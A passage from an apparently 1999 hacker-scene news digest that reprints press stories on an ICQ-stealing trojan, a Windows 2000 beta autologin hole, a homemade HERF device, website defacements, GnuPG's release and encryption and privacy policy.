"We talked about NAI's latest security solutions and the possibility of using these solutions for government IT projects.
The meeting generated high interest from government officials, notably Gen. Alexander Aguirre who chairs the NSC," Mansfield said.

Mansfield said the Philippine government could follow the example set by the United States government in beefing up security in government agencies that may be prone to malevolent intrusions of so-called computer "hackers."

According to reports, hacking is considered the most common form of cyber terrorism.

How pervasive is computer hacking? Mansfield said recent studies conducted by United States' Federal Bureau of Investigation (FBI) showed that as much as 90 percent of computer systems in the world are attacked by hackers and as much as 70 percent of these attacks result in financial losses.

In the US, average "financial damage" per company is pegged at US$84,000, Mansfield said.

The cases of intrusions are not limited to the US, he added, as most countries that are using IT in their respective governments are also prone to "cyber terrorists."

In the Philippines, recent reports stated that two government Web sites were "hacked," although damage was very "minimal." These were the Web sites of the Bangko Sentral ng Pilipinas (http://www.bsp.gov.ph ) and the Department of Energy (http://www.doe.gov.ph ).

Further, Mansfield said hacking is "quite easy" and that popular software applications such as Windows NT, which uses a 40-bit encryption system, can be hacked in as short a time as three hours, while systems with a 56-bit encryption can be hacked in three days.

"Of course, ordinary users may not be able to do so, but there are a number of very good computer users out there who can easily hack their way into your computer systems," Mansfield said.

The answer, Mansfield said, is the 128-bit encryption standard that is "virtually" impossible to hack. He added that the US government is so confident with this system that bills for Congress are now being "delivered" over the public network using a 128-bit encryption system.
Although the 128-bit encryption standard may be the panacea to prevent cyber terrorism, most countries, including the Philippines, may have to wait a little longer before they can acquire the technology due to the apparent reluctance of the US government to make the technology available to more countries.

"It is a matter of policy before 128-bit encryption technology becomes available to more countries outside of the US," Mansfield said.

@HWA

30.0 US Sen. Warns of Cyber Attack Along with Y2K
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by TurTlex

U.S. Sen. Robert Bennett, the head of the U.S. Senate Special Committee on the Year 2000 Technology Problem, has issued a warning that industrial spies and others may use the Y2K issue to cause mayhem. This article is unclear if the Senator was talking about Y2K coders who may insert bad code along with the fixes or people who will take advantage of existing holes and confusion to masquerade their attacks.

Computer World
http://www.computerworld.com/home/news.nsf/all/9909083y2kcon

(Online News, 09/08/99 05:23 PM)

Senators warn of Y2K hack potential
By Patrick Thibodeau

WASHINGTON -- The head of the U.S. Senate Special Committee on the Year 2000 Technology Problem warned today that hackers, people engaged in industrial espionage and even other countries may seize the year 2000 problem as their best shot to attack corporate and government information systems (see story).

"Those who wish us ill will for one reason or another," said U.S. Sen. Robert Bennett, will use Y2K "as an opportunity to attack."

Bennett and committee Vice Chairman Sen. Christopher Dodd also said that while the U.S. is in overall good shape to handle Y2K, they expect some failures domestically and more problems overseas. But they warned that if people hoard prescription drugs and food or begin pulling money out of banks, the Y2K problem could lead to larger problems.

"The greatest fear that I have is that you are going to get panic setting in ... from those who predict dire consequences," Dodd said.

Bennett and Dodd said the U.S. is in better shape than the rest of the world but will likely see some system failures.

"We have accomplished far more than I would have predicted," said Bennett. But he cautioned that his assessment is largely based on self-reporting by corporations and may be too rosy. "It's impossible to get a second opinion," he said.

Problems could occur in key U.S. cities. Only two of the 21 major U.S. cities, Boston and Dallas, were Y2K ready in a recent assessment by the U.S. General Accounting Office. The two cities the Senate committee is most worried about are San Francisco and Baltimore, said Bennett.

Internationally, Y2K progress in Russia, Japan and Italy is of key concern, said Dodd, although he said Latin America's Y2K effort has improved dramatically in the past several months.

But Dodd said negotiations with Russia over establishing a joint cooperation center to guard against accidental nuclear missile launches "are back on track" after being sidelined by the Kosovo crisis. Dodd said there could be a signed agreement in the next week or two.

@HWA

31.0 JPEG Steals ICQ Passwords
~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by mobys_dick_

A Trojan Horse masquerading as a .jpeg file has been circulating around the net for some time. It has affected at least 200 of AOL's 40 million customers. Details of the attack are scarce but the file somehow steals ICQ passwords.
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2331403,00.html

Wired
http://www.wired.com/news/news/technology/story/21663.html

C | Net
http://news.cnet.com/news/0-1005-200-114889.html?tag=st.ne.1002.bgif.1005-200-114889

PC World
http://www.pcworld.com/pcwtoday/article/0,1510,12721,00.html

ZDNet;

--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Trojan horse infects AOL's ICQ
By Margaret Kane, ZDNN
September 9, 1999 1:09 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2331403,00.html

A Trojan Horse masquerading as a JPEG file is allowing hackers to gain access to ICQ passwords, America Online Inc. officials confirmed today.

Officials at AOL (NYSE:AOL), which owns the ICQ instant messaging service, had only sketchy details on the hack. A spokeswoman said the company had begun receiving incident reports today, but said the company did not know how long the file may have been circulating.

Limited penetration

Only around 200 incidents have been reported, the spokeswoman said, out of the estimated 40 million subscribers.

She said that when consumers open the file a "hacker is able to gain access to ICQ passwords," but did not have any more information on how exactly the program worked.

She did say that the company had developed a way to restore a consumer's ICQ number to them.

-=-

Wired;

ICQ Users Get Disconnected
by Chris Oakes
2:30 p.m. 9.Sep.99.PDT

Imagine picking up your phone to find your line dead and your phone number in someone else's hands.

The cyberspace equivalent happened to users of the ICQ instant messaging system this week. Approximately 200 ICQ users reported their passwords stolen and their accounts taken over by unknown users.

"This is sort of like losing your own phone number that you've had for years and years," said Steve Gossett, an ICQ user in Temple City, California. "Not only do they have the ability to represent you, but they've stolen that part of your Internet -- that part of your 'phone.'"

Gossett uses the system for both personal communications and some business contacts worldwide. When his account was stolen, he said he had to notify over a hundred other ICQ contacts by email, telling them to ignore any messages sent under his ICQ number, as he no longer controlled it.

Gossett has resorted to using a secondary ICQ number.

"I've had three years of ICQ contacts -- some of them business contacts spread out across the US and a couple foreign countries."

America Online subsidiary Mirabilis maintains the ICQ network. More than 60,000 new users sign up daily for ICQ, which totals 42 million worldwide users. Members use the system to check if friends and colleagues are online, and send each other "instant" text messages.

AOL spokesperson Regina Lewis said the company has been aware of the problem for as long as a month and has a mechanism in place so users can get their number back. She said the number of reported incidents is less than 200.

Users' passwords were obtained by way of simple email trickery, Lewis said.

Over the last month, ICQ users have received an email message containing an attached file disguised as a JPEG. When users opened the attached file, instead of opening a JPEG image, the attachment loaded a small malicious program. The program emailed the user's ICQ password back to the sender.

The perpetrators have not been identified or stopped.

In any case, Lewis said users can retrieve their ICQ account numbers by sending email to support@icq.com. If users indicate they've had their number stolen, ICQ will return it within 24 hours after the user is verified, she said.

"The system was not compromised in any way. Somebody didn't go in and break into the database of ICQ," Lewis emphasized. She also reminded users not to open suspicious JPEG email attachments.

Lewis agreed that an ICQ account can be as important as a telephone line. "That's why it's so important that they can get it fixed -- because people love their ICQ."

Gossett said numerous attempts to log into his ICQ account Wednesday afternoon resulted in repeated "invalid password" rejection messages. When he visited his ICQ personal page on the Web, where users enter personal profile information about themselves, he discovered that his information was gone. In its place was just the name "honix," possibly that of a cracker.

He logged into his secondary ICQ account and found that someone else was logged on under his primary account. He then made a fruitless attempt to notify AOL tech support representatives.

Miami-based user Ricardo Arenas reported his password stolen in early August.

"A week later my ICQ number had disappeared from their database. It doesn't even exist anymore. I had to get a new one. It's a little annoying."

When he sent email to an ICQ feedback address, Arenas said he received only an automated email reply. In the intervening month, he received no information on the problem.

Neither Gossett nor Arenas recalls receiving the attachment as described by AOL.

The ICQ support message boards have lit up with complaints of the same problem. Users claim that when AOL was no help solving the problem, they gave up hope of getting their ICQ accounts back and opened new ones.

Lewis said users like Arenas and Gossett simply weren't following the correct path to support. "I don't know how they tried to get through, but the right way is support@icq.com."

The ICQ instant messaging system has experienced several security problems in the past. In August of last year, a security problem let ICQ members log into the network using other users' accounts. Using the bug, an imposter could potentially talk his way into gaining sensitive information.
Earlier that year, security experts criticized ICQ for lacking secure barriers against hijacking, spoofs, and other hostile programs that could listen in on personal and potentially sensitive communications sent over the system.

Since then ICQ said it had worked to improve security.

-=-

C|Net;

Trojan horse steals ICQ users' identities
By Paul Festa
Staff Writer, CNET News.com
September 9, 1999, 4:20 p.m. PT

Hundreds of ICQ users have found themselves temporarily duped out of their online identities, as a new Trojan horse is making its way around the Net.

ICQ members are identified by numbers. With more than 42 million registrations, newer numbers have become quite lengthy, making the shorter numerical IDs of early ICQ adopters hot properties.

Now those shorter name tags are the targets of theft, as malicious hackers are distributing a Trojan horse that steals passwords and commandeers control of ICQ accounts.

A Trojan horse is a piece of computer code that behaves in an unexpected, usually nefarious manner. In this case, the Trojan is disguised as a JPEG image file, distributed by email, that steals the ICQ password from the user's hard drive.

AOL, which bought ICQ last year, said it had anticipated the theft of low-numbered ICQ accounts and had provided a way of verifying the authenticity of the accounts' original owners and restoring control to them. Users whose passwords have been stolen can be re-authenticated at ICQ.com.

So far, about 200 ICQ users have reported having their passwords stolen in recent weeks, AOL said.

The Trojan was first reported by Wired News.

-=-

PCWorld;

From PC World Online

Trojan Horse Hits ICQ

Passwords are compromised for about 200 users of the lead instant-messaging suite.

by Jack McCarthy, IDG News Service
September 10, 1999, 3:34 a.m. PT

A hacker using a Trojan Horse disguised as a JPEG file has gained access to a small number of ICQ passwords, an America Online official said on Thursday.
Only about 200 ICQ passwords have been compromised out of a subscriber base of more than 40 million people, according to Regina Lewis, a spokesperson for the ICQ messaging service, which is owned by AOL.

However, ICQ will issue new passwords to those people within 24 hours, Lewis said. New passwords can also be obtained by e-mailing ICQ at support@icq.com, she added.

Access to the passwords was gained when ICQ subscribers received an e-mail with an attachment for an executable file. When the attachment was launched, the ICQ password was automatically exposed. The hacker used e-mail addresses picked up from commonly-available ICQ directories and message boards, Lewis said.

"It's pretty straightforward e-mail hacking," Lewis said. "It's password fishing."

Lewis recommended that subscribers do not open attachments in e-mails from unknown sources.

The origin of the Trojan Horse, which is a malicious program masquerading as a benign application, had not been traced by late Thursday, although efforts were underway to find the source, according to Lewis.

@HWA

32.0 BackDoor in Windows Found
~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by evil wuench

A real back door has been found in Windows 2000 Beta 3. MS said it knew about the hole back in April and that approximately 650,000 systems could be at risk. The problem is based in the 'autologin' account that is automatically created for users who are not connected to a domain. If the telnet server is active, which can be done remotely with Visual Basic commands, a malicious attacker could log in through this account and have complete control over the system.

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2331412,00.html

--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

A real Windows back door
By David Raikow, Sm@rt Reseller
September 9, 1999 12:58 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2331412,00.html

Amid all the spurious hype about the supposed "NSA Back Door" in Windows NT, a real and very dangerous security breach in some builds of Windows 2000 Beta 3 has gone almost unnoticed.

In an e-mail circulated Monday, David Litchfield of security consultancy Arca Systems Inc. described a simple technique that would give an attacker full access to a susceptible machine.

Microsoft (Nasdaq:MSFT) acknowledges it was aware of the breach within days of shipping Windows 2000 Beta 3 in April. The breach will be disabled in its Release Candidate 2 build, which Microsoft could release next week.

While not the final release of Windows 2000, Beta 3 is the most widely circulated build, and one which Microsoft sold to interested testers and got certain OEMs to agree to preload on new systems. Microsoft claims that more than 650,000 testers are working with the build and the subsequent release candidates which Beta 3 testers receive.

Autologin the culprit

The Windows 2000 security problem stems from an "autologin" feature that Microsoft incorporated into the initial Beta 3 release. On machines not connected to a domain -- including the vast majority of home users -- affected versions of the Windows 2000 installer automatically create an "autologin" account based on the user's software registration information. This account has administrative privileges on the system and has no password.

By itself, this feature presents little problem unless an attacker can get physical access to the machine in question. If the Telnet server built into Windows 2000 is active, however, an attacker could use a nbtstat command to find the autologin account user name, and log in with complete control over the computer.
Even worse, the Telnet server can be covertly activated by a simple Visual Basic script hidden in any HTML document.

Scott Culp, Microsoft security manager for NT, acknowledged that the autologin feature had presented a threat, but said that it had been removed in recent builds. He was unable to provide the precise build number in which autologin was removed.

"This was an option intended to allow users with good physical access to their hardware a simplified login process, but our security team quickly recognized the problems involved and insisted on its removal," said Culp.

'... Not ready to ship'

"It's important to remember that this is a beta product, and not ready to ship. Finding these kinds of problems is what the beta process is all about."

Culp also acknowledged that a remote user could start the Windows 2000 Telnet server. While this bug in itself has serious security implications, he insisted that the removal of the autologin feature had rendered it useless to an attacker.

"The attack requires an account with a known name and password, but ... we've already implemented changes that prevent that," he said.

The "autologin" feature was implemented in Microsoft Windows Beta 3, and will not exist in the forthcoming Release Candidate 2. According to Microsoft, the feature was altered to prompt users for a password in Release Candidate 1, which they released to testers in July.

Additional reporting by Will Knight, ZDNet UK, and Mary Jo Foley, Sm@rt Reseller.

@HWA

33.0 HERF Gun Demonstrated at InfowarCon
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Code Kid

At the Infowar Conference held Wednesday in Washington DC a California engineer demonstrated a High Energy Radio Frequency Weapon capable of remotely disrupting computers, automobiles, medical equipment and other electronic devices. The demonstration was done with $500 worth of spare parts assembled from a local electronics store.
(Until I see a demonstration that has a range of over 300 meters or a 'blast' radius of over 25 meters I'm not going to get too worried about this technology. While numerous people have claimed such weapons exist they are either classified or otherwise shrouded in secrecy. A 30 meter range does not constitute a viable weapon.)

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2331772,00.html

--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Zap! ... and your PC's dead
By Kevin Poulsen, ZDNN
September 9, 1999 5:44 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2331772,00.html?chkpt=hpqs014

WASHINGTON -- With $500 and a trip to the hardware store, saboteurs can build a device capable of remotely disrupting computers, automobiles, medical equipment and nearly anything else dependent on electronics, according to a California engineer who demonstrated a homebrew computer death-ray at the InfowarCon '99 conference here Wednesday.

Former Navy engineer David Schriner showed off an unwieldy device constructed from a parabolic reflector, a horn antenna and two automotive ignition coils, which he aimed at two personal computers about 20 feet away.

When an assistant activated the Rube Goldberg contraption by connecting it to a car battery, the conference room filled with a loud buzzing from the PA system and a PowerPoint presentation on the projection screen flickered and scattered. One of the computers instantly dropped out of its screen saver.

When the device was switched off, both PCs were frozen, and wouldn't respond to keyboard input.

HERF emissions a killer

The effects of High Energy Radio Frequency (HERF) emissions on electronics are well known among engineers, and info-warriors have expressed concern that adversarial nations may someday include computer-killing devices in their arsenals.
Military aircraft are built with hardened electronics designed to survive the electromagnetic pulse created by a nuclear detonation. Schriner theorized that a single nuclear weapon designed specifically for the purpose, "would probably take out all of the electronics on the East Coast."

But Schriner, who has devoted his research to small-scale electronic warfare, said the demonstration was intended as a "wake up call" to show that even low-budget saboteurs can create viable electronic weapons.

Wal-Mart-powered weapon

"We bought the car battery at Wal-Mart yesterday," said Schriner. "It's all stuff you can buy at the hardware store."

The HERF gun is not particularly high-tech, either. The device uses technology dating back to Tesla, essentially pushing a 20 megawatt burst of undisciplined radio noise through an antenna. The energy is enough to interfere with sensitive computer components nearby, creating unpredictable results ranging from minor anomalous behavior, to complete burnout.

Schriner said he's built larger HERF guns capable of crashing computers and disabling automobiles at a range of 100 feet, with a cost as low as $300.

That's going in the script

Jonathan Lemkin, a screenwriter working on an infowar script for Paramount, was particularly impressed with the dramatic display and menacing hardware. "That's definitely going in the movie," he said.

The computers targeted in today's demonstration worked fine after rebooting, and Schriner said permanent damage is uncommon. "But if that happens to be a computer in a tank, or in a piece of medical equipment, how long does it take to reboot? . . . By that time you could be dead."

Conference organizer and infowar author Winn Schwartau said Wednesday's demonstration validates a threat he first tried to warn Congress about in 1991. "They asked if I thought they should add HERF guns to the Brady Bill," Schwartau recalls.
@HWA

34.0 GNU Launches Free Encryption Tool
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Weld Pond

As a replacement for the now commercial PGP, GNU software has released GNU Privacy Guard (GnuPG) version 1.0.0. Since the software was developed outside the US, does not contain any patented algorithms and is in the public domain the software does not come under control of US export restrictions or the Wassenaar agreement. GnuPG features 128 bit encryption, support for a key expiration date, and comes in eight different languages. It was originally written for GNU/Linux, FreeBSD and OpenBSD systems, and has recently been ported to Windows.

GNU Privacy Guard
http://www.gnupg.org/

Free Software Foundation
http://www.fsf.org/

CNN
http://www.cnn.com/TECH/computing/9909/09/gnupg.idg/index.html

CNN;

GNU launches free encryption tool

September 9, 1999
Web posted at: 12:52 p.m. EDT (1652 GMT)

by Douglas F. Gray

From...

(IDG) -- Open-source software group GNU on Tuesday announced the release of its message-encryption tool GNU Privacy Guard (GnuPG) version 1.0.0.

The privacy-protection program, which is available now, is billed as a replacement for PGP (Pretty Good Privacy) protection. Because GnuPG does not use patented algorithms such as IDEA (International Data Encryption Algorithm), as well as the fact that it was developed outside of the U.S., it is not subject to export restrictions as PGP is, the group said.

"This was all developed outside the U.S., and that was done deliberately so GnuPG could be distributed both inside and outside the U.S.," according to Brian Youmans, distribution manager at the Free Software Foundation, Inc. (FSF), which was originally created to support the GNU Project.

According to the GnuPG Web site, the software is not controlled by the Wassenaar agreement either, because it is in the public domain.
The Wassenaar agreement was signed in December 1998 by 33 countries to put export controls on some types of encryption software. "The (encryption) project is not a formal project of the Foundation itself, and we didn't actually pay anyone to work on it, but we are certainly very glad it happened," Youmans stated. He added that if the FSF had paid anyone, it could possibly have broken the "created outside the U.S." rule which is needed to avoid export restrictions. Tuesday's release of GnuPG is the first "fully functional production release," according to Youmans, but the application has been beta tested in different pre-production versions for over a year. Like PGP, GnuPG uses 128-bit encryption. It was created by Werner Koch, a software developer based in Germany. A beta version of the product was released in January. GnuPG also features a number of security enhancements, including support for a key expiration date, support in eight languages and an online help system. Privacy Guard works on GNU/Linux, FreeBSD and OpenBSD systems, and although it was not written with Microsoft Corp.'s Windows and Windows NT systems in mind, it has been ported to those systems with positive results, according to Youmans. The GNU Project, based in Boston, Massachusetts, was launched in 1984 to develop a free Unix-like operating system, called GNU/Linux.

@HWA

35.0 Fringe Goes Offline
     ~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by White Vampire
The popular web site 'Fringe of the Web' has decided to shut down after a year in operation. FoW was a popular underground web site ranking page that allowed people to rank web sites based on which ones they visited. This is the second time the FoW has been decommissioned, the first time was back in 1996. The admin of the site RSnake says he will probably leave the scene.
Project Gamma http://www.projectgamma.com/news/archive/1999/september/090999-2328.html The Fringe is no more, at least for now September 9, 1999, 23:25 Author: WHiTe VaMPiRe The Fringe of the Web was created by Bronc Buster at some point in 1994, and was one of the first Webrings. The ring lasted until approximately 1996; Bronc Buster brought it down due to degradation in the scene, and continued on with other projects. The Fringe was no more.. ...At least until early 1998. RSnake resurfaced The Fringe of the Web to "make a kick-ass website," as he put it. This evolution of The Fringe was a Top site list, as RSnake felt it was best to place "relevance higher according to the amount of traffic flowing to it." He wanted to provide a resource to find other Web sites that were still up, operational, and had good quality content. That was going great until a few days ago. The Fringe of the Web, is once again, no more. At least for now, until somebody else brings back the legacy. RSnake decided to take down The Fringe of the Web due to lack of participation from other programmers, lack of time, and lack of resources. The Fringe of the Web's domain, Webfringe.com, is currently redirected to another Web site. RSnake wanted to make the following known: I only want known that I tried my very best to get kids to learn something. I provided no files or warez on the website itself et al. People asked how I learned and I will tell you, I put up a little website that had a few hundred hits a day, and made an open invitation to answer any questions anyone had. Most of the time I didn't know the answer, but that's the thing about the Internet. Go to a page like www.startfrom.com/linux and start surfing. If you ask a search engine the right questions, you are guaranteed to get the right answer. I lost a lot of faith with all the people who randomly came into #webfringe on irc.webmaster.com because they were unwilling (not unable) to learn. 
A few good kids came out knowing a lot about programming (Parasitic for one), but most were much more interested in finding their script to nuke some poor clueless kiddy. I don't know, there's just something wrong when 80% of the people who enter a hacking channel want only to know how to run a remote system administration tool (BO) or read someone's hotmail account, and they think that's the world of hacking. Maybe I'm an idealist, but I wanted people to learn. I didn't do it for the glory; I did it for the love. It's hard to do something for so long and get nothing from it. I regret that it has to go down in its current format, but I am glad a few greatly benefited from it. Major props to Bronc Buster (for the FOTW name), Tattooman (for the late night talks when I was down), Parasitic (for the help on FOTW good luck in college bro, I wish you the best), SpeedyGrl & P4nd0r4 & Jezzabelle & LDJ & MidnightStarz (for being rad libidinous haX0r b4b3s), Silicon Toad (for being my inspiration and a great guy), Team Catharsys ;) (for kicking some ass), and the rest of the people I am forgetting. Where is RSnake going from here? He did not want to discuss what was going on in his personal life, however, he did say, "I think the name RSnake is a thing of the past, I'm not going to disappear, I am just moving to a point where I can't see myself working on hacking sites anymore." Relevant Links: The Fringe of the Web (Redirected to another site) http://www.webfringe.com/ @HWA 36.0 IACSP Defaced ~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by wanker The web site for the International Association for Counterterrorism and Security Professionals has been defaced for the second time in one week. Computer Currents http://www.currents.net/newstoday/99/09/09/news2.html HNN Cracked Pages Archive http://www.hackernews.com/archive/crackarch.html Daily News Cracker's Hits A Second Time By Bob Woods, Newsbytes. 
September 09, 1999

A group of crackers calling itself the "un1x b0wling t34m" (Unix bowling team) or "b0wl3rz" (bowlerz) infiltrated a Website associated with the International Association For Counterterrorism & Security Professionals (IACSP) for the second time in a week.

In the letter-and-number style of most crackers, the group wrote, "th3 m1ndl3ss 4buz3 4nd 1nt1m1d4t10n 0f c0unt3rz muzt b3 st0pp3d 4t 4ll c0zts" (Translation: The mindless abuse and intimidation of counterz must be stopped at all costs).

"0rg4n1z4t10nz such 4s th3 1nt3rn4t10n4l 4ss0c14t10n f0r c0unt3r t3rr0r1zm 4r3 s4d1st1c g0dl3ss b4st4rdz wh0 g41n 0rg4sm1c pl34sure fr0m the suff3r1ng 4nd t0rm3nt 0f d3f3nc3l3zz cgi skr1ptz" (Organizations such as the International Association for Counterterrorism are sadistic godless bastards who gain orgasmic pleasure from the suffering and torment of defenseless cgi (common gateway interface) scripts).

"th3 un1x b0wl1ng t34m c4nn0t st4nd 1dly by 4nd l3t th1z h4pp3n. Th3r3f0re, w3 4r3 br1ng1ng the ruckuz t0 4ll y0u m0th3rf****" (The Unix bowling team cannot stand idly by and let this happen. Therefore, we are bringing the ruckus to all you "expletive deleted").

Also on the defaced site was a picture of three tour buses with the name "Lamers" painted on all of them. IACSP officials were not available for comment by Newsbytes' late-edition deadline.

Last Friday, the b0wl3rz hit IACSP's SecurityNet.net site, which provides professionals in the law enforcement, military, government, and corporate security industry an "intelligence network that will provide the necessary tactical and educational information to prepare and hopefully deter terrorism in all of its forms in the fast approaching 21st century," the site said.

The cracked SecurityNet.net site last week said: "0h d34r. dubyadubyadubya securitynet dot net? y0u bezt loq d0wn ur s*** in c4ze those n4sty UB0wl3rz c0me kn0ck1n" (Oh, dear. www.securitynet.net?
You best log down your expletive deleted in case those nasty Ubowlers come knockin). Besides the two IACSP sites, the b0wl3rz have hit at least four other sites in September, according to the Attrition Website, (http://www.attrition.org ), which among other things provides a mirror record of infiltrated Websites. A copy of the defaced IACSP site is available at the Attrition site. Additionally, b0wl3rz issued a thinly veiled threat in the note left last week at the cracked SecurityNet.net site: "com1ng soon from b0wlerz - wingsgi.gsfc.nasa.gov (apparently associated with NASA's Goddard Space Flight Center) and www.mormon.com!" As of the Newsbytes late-edition deadline today, it appears neither site had been cracked. Regarding the threats to NASA and the Mormon sites, Steve Fustero, president of the Arlington, Va.-based International Association For Counterterrorism & Security Professionals, told Newsbytes last week, "They want to show they have some muscle and show they can get into other sites." IACSP's Website is at http://www.iacsp.com . @HWA 37.0 RUSSIAN HACKERS REPORTEDLY ACCESSED US MILITARY SECRETS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Sunday 12th September 1999 on 11:00 pm CET Russian hackers broke into U.S. government computers and may have snatched classified naval codes and information on missile systems, Newsweek reported in its latest issue. The weekly, quoting intelligence sources, said the suspects were elite cyber-spooks from the Russian Academy of Sciences, a government-backed organization which works with Russia's leading military laboratories. Newsweek quoted one Pentagon official as saying this was "a state-sponsored Russian intelligence effort to get U.S. technology," adding it was apparently the first such attempt by Moscow. It further quoted Deputy Defense Secretary John Hamre as saying: "We're in the middle of a cyber war." 
Nando Times;
http://www.techserver.com/noframes/story/0,2294,92270-146247-1027890-0,00.html

Russian hackers reportedly accessed U.S. military secrets

Copyright © 1999 Nando Media
Copyright © 1999 Agence France-Presse

WASHINGTON (September 12, 1999 2:03 p.m. EDT http://www.nandotimes.com) - Russian hackers broke into U.S. government computers and may have snatched classified naval codes and information on missile systems, Newsweek reported in its latest issue. The weekly, quoting intelligence sources, said the suspects were elite cyber-spooks from the Russian Academy of Sciences, a government-backed organization which works with Russia's leading military laboratories. The hackers targeted computer systems at the Defense and Energy Departments, military contractors and leading civilian universities. Pentagon officials, describing the intrusions as "sophisticated, patient and persistent," said they began in January and were almost immediately detected by U.S. security agents who traced them back to computers in Russia and developed counter-measures, according to Newsweek. But the cyber-spies were said to have quickly developed new tools that allowed them to penetrate undetected, although they at times left behind electronic traces. Newsweek quoted one Pentagon official as saying this was "a state-sponsored Russian intelligence effort to get U.S. technology," adding it was apparently the first such attempt by Moscow. The weekly said Washington had not yet protested to Moscow but quoted Deputy Defense Secretary John Hamre as saying: "We're in the middle of a cyber war." It said the security breach was so serious that the Pentagon had ordered its civilian and military employees to change their computer passwords, the first time such a step has been taken.
@HWA 38.0 NET PRIVACY STUDY INCLUDED IN RD BILL ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com by Thejian, Sunday 12th September 1999 on 10:50 pm CET The House Science Committee Thursday voted 41-0 to approve the $4.8 billion federal research fund that includes an amendment calling for a study on ways to increase online privacy protections. The amendment calls for a study into what technology must be developed to improve Internet privacy; address current public/private plans for deploying privacy technology, standards and policies; and address international privacy protection policies. http://www.32bitsonline.com/news.php3?news=news/199909/nb199909096&page=1 Net Privacy Study Included In R&D Bill By: Robert MacMillan Newsbytes. Date: 09/10/99 Location: WASHINGTON, DC, U.S.A. Some technology groups have praised Thursday's House Science Committee markup of a bill that promotes federal research grants, and that also calls for a comprehensive online privacy study, though at least one industry representative has taken a dim view of the study. The House Science Committee Thursday voted 41-0 to approve the $4.8 billion federal research fund that includes an amendment calling for a study on ways to increase online privacy protections. "We have a very robust development effort underway throughout the industry to do this without more government studies," said David McClure, executive director of the Association of Online Professionals. "I'm not certain what the ultimate objective of such a study will be." H.R. 2086, the Networking and Information Technology Research and Development Act, sponsored by Science Committee Chairman F. James Sensenbrenner, R-Wis., was passed unanimously with a number of minor amendments besides the privacy study. 
The bill could help provide an "out" to both parties looking to say they support a permanent research and development tax credit extension, especially since the five-year plan in the $792 billion GOP tax cut package is expected to suffer an ignominious fate of death by veto-threat at any time. Most of the amendments were technical in nature, some of which corrected erroneous budget requests submitted by the US Energy Department. The privacy study amendment, submitted by Rep. David Wu, D-Ore., calls on the National Science Foundation and the National Academy of Sciences's National Research Council to: find out what technology must be developed to improve Internet privacy; address current public/private plans for deploying privacy technology, standards and policies; and address international privacy protection policies. The report would be due in one year and nine months after the bill is passed into law. McClure said the bill addresses a no-win issue for people on both sides of the online privacy fence. "No matter what you do with privacy, one faction is going to claim you're too restrictive whereas the other will claim that it certainly doesn't go far enough," he said. "This is not an entreaty to say that we shouldn't do anything...but to somehow assume that the whole problem is technology...is a naive view of the market. "I am never really comfortable with these kinds of amendments which are added to bills where the initial purpose of the bill is fairly clear-cut," McClure also said. "It goes back to the whole congressional concept that if you have a little amendment that you think is going to make people choke and gag, you add it to a bill that everyone is supportive of." Wu staffers were not immediately available for comment. The overall bill authorizes $4.3 billion for high-performance computing funding across several agencies, along with $385 million for "terascale" computing and $111 million for Next-Generation Internet funding. 
Since the NGI project already has been authorized for fiscal year 2000, the total $4.768 billion in H.R. 2086 only includes the $111 million amount for NGI beyond that fiscal year. Taking into account the total amount of FY2000 funding for NGI, the total amount the bill authorizes would be $4.836 billion. Under the terms of the bill, $2.5 billion goes to the National Science Foundation, $1 billion goes to NASA, $566.2 million goes to the Energy Department, $62 million goes to the National Institute for Standards and Technology, $71.7 million goes to the National Oceanographic and Atmospheric Administration, and $22.3 million goes to the Environmental Protection Agency. These amounts go in part to long-term basic research grants in information and networking technology, large grants, information technology research centers, major research equipment, and other items. In the NGI funding department, the $111 million over 2001-2002 includes $50 million for the NSF, $20 million for NASA, $30 million for the Energy Department, and $11 million for NIST. "This bill offers opportunities for all," Sensenbrenner said, adding that the President's Information Technology Advisory Council also supports the bill. The bill also requires the NSF to study the availability of strong encryption products in the international market, "and how they compare with encryption technologies subject to export restrictions in the United States." The report would be due six months after the bill is signed. The bill now proceeds to the House floor for consideration. Compliments soon after the markup surfaced from the high-tech community, including the TechNet lobbying group. TechNET Chief Executive Roberta Katz in a statement praised Sensenbrenner for his support of high-technology issues. "Chairman Sensenbrenner is a tireless advocate for ensuring America's place as the technology leader," Katz said. 
